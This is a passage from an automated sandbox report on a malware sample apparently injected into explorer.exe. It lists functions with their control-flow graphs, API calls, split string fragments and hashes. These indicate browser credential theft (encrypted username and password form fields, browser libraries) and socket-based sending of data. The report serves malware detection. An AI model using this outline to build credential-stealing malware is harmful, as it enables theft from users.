8cdd628-8cdd651 call 8cdd942 364->373 374 8cdd657-8cdd66b call 8cdee92 364->374 370 8cdd6bd-8cdd6c4 365->370 371 8cdd739-8cdd73c 365->371 366->354 367->320 367->368 368->320 369 8cdd5ac-8cdd5b6 368->369 369->320 377 8cdd5bc-8cdd5e6 369->377 378 8cdd6f5-8cdd734 370->378 379 8cdd6c6-8cdd6ef call 8cdd942 370->379 381 8cdd7c4-8cdd7c7 371->381 382 8cdd742-8cdd749 371->382 373->320 373->374 374->320 391 8cdd671-8cdd6b3 374->391 377->366 401 8cdd894-8cdd8a9 378->401 379->351 379->378 381->320 387 8cdd7cd-8cdd7d4 381->387 384 8cdd74b-8cdd774 call 8cdd942 382->384 385 8cdd77a-8cdd7bf 382->385 384->351 384->385 385->401 392 8cdd7fc-8cdd803 387->392 393 8cdd7d6-8cdd7f6 call 8cdd942 387->393 391->324 399 8cdd82b-8cdd835 392->399 400 8cdd805-8cdd825 call 8cdd942 392->400 393->392 399->351 402 8cdd837-8cdd83e 399->402 400->399 401->324 402->351 406 8cdd840-8cdd886 402->406 406->401
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID: `
                                                                                                                                                                                    • API String ID: 823142352-2679148245
                                                                                                                                                                                    • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                    • Instruction ID: 26bc5fa88aff633eb195eeed6806f725c8c547b8568cd3ed69cb5dd4b209391b
                                                                                                                                                                                    • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA224D70A18F099FDB59EF68C4946AAB7F1FB98302F40462ED65ED3250DB30E552CB81
                                                                                                                                                                                    Function 08CDEE12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 459 8cdee12-8cdee38 460 8cdee45-8cdee6e NtProtectVirtualMemory 459->460 461 8cdee40 call 8cdd942 459->461 462 8cdee7d-8cdee8f 460->462 463 8cdee70-8cdee7c 460->463 461->460
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtProtectVirtualMemory.NTDLL ref: 08CDEE67
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2706961497-0
                                                                                                                                                                                    • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                    • Instruction ID: ca54507ec25262086d96473167f66559c5c1bc764bc45095f8ea291ea2092ce7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                    • Instruction Fuzzy Hash: D801B134668B484F8B88EF6CD48412AB7E4FBCE315F000B3EE99AC7250EB70C5414742
                                                                                                                                                                                    Function 08CDEE0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 464 8cdee0a-8cdee6e call 8cdd942 NtProtectVirtualMemory 467 8cdee7d-8cdee8f 464->467 468 8cdee70-8cdee7c 464->468
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtProtectVirtualMemory.NTDLL ref: 08CDEE67
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2706961497-0
                                                                                                                                                                                    • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                    • Instruction ID: d7ff074f071e40e2efc1c4a6290a2e21dbac9eda10e34f6a579a4b160226839b
                                                                                                                                                                                    • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                    • Instruction Fuzzy Hash: B501A234628B884B8B48EB6C94452A6B3E5FBCE315F000B3EE99AC3241DB21D5024782
                                                                                                                                                                                    Function 08CD88C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ObtainUserAgentString.URLMON ref: 08CD89A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 2681117516-319646191
                                                                                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction ID: 338b0d1330069b54e0228b2b608cbfd786ac712b3c5b24f89f4f9e12cee5e5a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2319C71614B0C8BCB44FFA8D8847EEB7F1FB58216F40422AD95ED7240DE7896458789
                                                                                                                                                                                    Function 08CD88BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ObtainUserAgentString.URLMON ref: 08CD89A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                    • API String ID: 2681117516-319646191
                                                                                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction ID: 42bf611b71940f2b45bf10e286d26ee157be5e99eb93873c53e9112b8a730839
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                    • Instruction Fuzzy Hash: CC218F70A14B4C8ACB05FFA8C8847EEBBB1FB58206F40422ED55AD7340DE7496458789
                                                                                                                                                                                    Function 08CD4B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 232 8cd4b66-8cd4b68 233 8cd4b6a-8cd4b6b 232->233 234 8cd4b93-8cd4bb8 232->234 235 8cd4b6d-8cd4b71 233->235 236 8cd4bbe-8cd4c22 call 8cdb612 call 8cdd942 * 2 233->236 237 8cd4bbb-8cd4bbc 234->237 235->237 238 8cd4b73-8cd4b92 235->238 246 8cd4cdc 236->246 247 8cd4c28-8cd4c2b 236->247 237->236 238->234 249 8cd4cde-8cd4cf6 246->249 247->246 248 8cd4c31-8cd4cb0 call 8cdfda4 call 8cdf022 call 8cdf3e2 call 8cdf022 call 8cdf3e2 247->248 261 8cd4cb5-8cd4cca CreateMutexExW 248->261 262 8cd4cce-8cd4cd3 261->262 262->246 263 8cd4cd5-8cd4cda 262->263 263->249
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                                    • String ID: .dll$el32$kern
                                                                                                                                                                                    • API String ID: 1964310414-1222553051
                                                                                                                                                                                    • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                    • Instruction ID: 5261e2d26b0460bdaf04e423e006e22a855f6ecc28f3b922d1e18cebf7967cb3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED415E74918A088FDB54FFA8C4947AD77F0FF98301F04427AC94ADB255DE309946CB85
                                                                                                                                                                                    Function 08CD4B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateMutex
                                                                                                                                                                                    • String ID: .dll$el32$kern
                                                                                                                                                                                    • API String ID: 1964310414-1222553051
                                                                                                                                                                                    • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                    • Instruction ID: c1279728d6dd9f7901e56d95b35cf9d30f9c0556a4521995feba44f244cc44b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0414C74918A088FDB44EFA8C494BAD77F0FF98301F44417AC94EDB255DE309946CB85
                                                                                                                                                                                    Function 08CDA72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 293 8cda72e-8cda768 294 8cda788-8cda7ab connect 293->294 295 8cda76a-8cda782 call 8cdd942 293->295 295->294
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: connect
                                                                                                                                                                                    • String ID: conn$ect
                                                                                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                                                                                    • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                    • Instruction ID: d30e56ac61c83965360f0c5e3e5001e10bd6178d163d5d21430a97741cd6bd3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7015E30618B188FCB84EF5CE088B55B7E0FB58315F1545AED90DCB226CB74C9818BC2
                                                                                                                                                                                    Function 08CDA732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 298 8cda732-8cda768 299 8cda788-8cda7ab connect 298->299 300 8cda76a-8cda782 call 8cdd942 298->300 300->299
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: connect
                                                                                                                                                                                    • String ID: conn$ect
                                                                                                                                                                                    • API String ID: 1959786783-716201944
                                                                                                                                                                                    • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                    • Instruction ID: c7403e893eaa379e485d6c586ce38ba92f0c13708aeaff43713d535e6ec5f050
                                                                                                                                                                                    • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B012C70618A1C8FCB88EF5CE088B55B7E0FB59315F1541AEA90DCB226CB74C9818BC2
                                                                                                                                                                                    Function 08CDA6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 411 8cda6b2-8cda6e5 412 8cda705-8cda72d send 411->412 413 8cda6e7-8cda6ff call 8cdd942 411->413 413->412
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: send
                                                                                                                                                                                    • String ID: send
                                                                                                                                                                                    • API String ID: 2809346765-2809346765
                                                                                                                                                                                    • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                    • Instruction ID: 48cc7484f0b4cf38c5312ed73b92bdd79d9f2a192bb3bced9caf3ab2fb7359c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA011270518A188FDB84EF5CD048B2577E0EB58315F1645AED95DCB266CA70D8818B85
                                                                                                                                                                                    Function 08CDA5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 416 8cda5b2-8cda5ea 417 8cda5ec-8cda604 call 8cdd942 416->417 418 8cda60a-8cda62b socket 416->418 417->418
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: socket
                                                                                                                                                                                    • String ID: sock
                                                                                                                                                                                    • API String ID: 98920635-2415254727
                                                                                                                                                                                    • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                    • Instruction ID: 08fdef83da2582614fc05bdf6a3dbca06fc1005e883a5f9908493938d6791304
                                                                                                                                                                                    • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 510121706187188FCB84EF5CD048B54BBE0FB59315F1545ADE55ECB266C7B0C9828B86
                                                                                                                                                                                    Function 08CD22DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 433 8cd22dd-8cd2320 call 8cdd942 436 8cd23fa-8cd240e 433->436 437 8cd2326 433->437 438 8cd2328-8cd2339 SleepEx 437->438 438->438 439 8cd233b-8cd2341 438->439 440 8cd234b-8cd2352 439->440 441 8cd2343-8cd2349 439->441 443 8cd2354-8cd235a 440->443 444 8cd2370-8cd2376 440->444 441->440 442 8cd235c-8cd236a call 8cdcf12 441->442 442->444 443->442 443->444 446 8cd2378-8cd237e 444->446 447 8cd23b7-8cd23bd 444->447 446->447 449 8cd2380-8cd238a 446->449 450 8cd23bf-8cd23cf call 8cd2e72 447->450 451 8cd23d4-8cd23db 447->451 449->447 453 8cd238c-8cd23b1 call 8cd3432 449->453 450->451 451->438 452 8cd23e1-8cd23f5 call 8cd20f2 451->452 452->438 453->447
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                    • Instruction ID: a2d62f7e8a461386f1d9ea0bb20d3271b3f825e09aad45332aab793fcc6f9f69
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8316B75604B49DFDB64FF2980882A9B7B5FB54302F44467ECA2DCB206CB34A152CFA1
                                                                                                                                                                                    Function 08CD2412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                    • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                    • Instruction ID: 4f7e0997c44db32c6280f344873ea0f029b7ed8ecf5bd9b08cba478e7fa6148f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF0C834668B484FD784FB2CD44562AB3E0FBE8215F44053E9A4EC3255DE25C5424755

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 081F8D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                                                                                                                    • API String ID: 0-393284711
                                                                                                                                                                                    • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                    • Instruction ID: 14d31900395fcb18c80a913f0b524009494bf668f11cf29eb8a79106fa52d5a5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 08E16A74628F488FC764EF68C498BAAB7E0FF58301F504A2E959BC7252DF70A505CB85
                                                                                                                                                                                    Function 081FB792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                                                                                                                    • API String ID: 0-2916316912
                                                                                                                                                                                    • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                    • Instruction ID: 190f80a5a1523c24da9ba8db325855c1cd00b93268249070e147bb6203c61f46
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FB17C30628B488EDB55EF68C489AEEB7F1FF98301F50491ED49AC7252EF7095058B86
                                                                                                                                                                                    Function 081F9622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                                                                                                                    • API String ID: 0-1539916866
                                                                                                                                                                                    • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                    • Instruction ID: 7b6ef7e04e923aec5f1f223cd997425383e0ea0d58f8e095af595c22a45d34d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841C270A18B088FDB14EF98A8457BDBBE2FB88701F00026ED509D3346DBB59D458BD6
                                                                                                                                                                                    Function 08200AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                                                                                                                                                                    • API String ID: 0-355182820
                                                                                                                                                                                    • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                    • Instruction ID: f5f4552bd2bb3f5494715fde4c65f1b055fa4493dfbb0e814eecd161ce4a1faf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C16A74228F098FC758EF68C489AEAF3E1FB94305F40462E959AC7251DF70A515CB86
                                                                                                                                                                                    Function 08200F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                                                                                                                                                                    • API String ID: 0-97273177
                                                                                                                                                                                    • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                    • Instruction ID: c8205f6ea5896b311039b7b45b200fd37276a623ea87ce68ea6b7f1c03446cda
                                                                                                                                                                                    • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                                                                                                                                                                    • Instruction Fuzzy Hash: F751D6315287488FD719DF18C8852AAB7E5FBC5701F50192EE8CBC7242DBB49906CF82
                                                                                                                                                                                    Function 081FA2F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                                                                                                                                                                    • API String ID: 0-639201278
                                                                                                                                                                                    • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                    • Instruction ID: f27b50cb37e4088d12280d304009ac1c9824fec7b3f3576ea0a8a99e3b97a330
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 20C19F74628A198FC758EB68D459AAAB3E1FF98305F54432D950FC7352DF30AA02CB85
                                                                                                                                                                                    Function 081FA2F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.929970443.0000000008170000.00000040.00000001.00040000.00000000.sdmp, Offset: 08170000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8170000_explorer.jbxd
                                                                                                                                                                                    Similarity
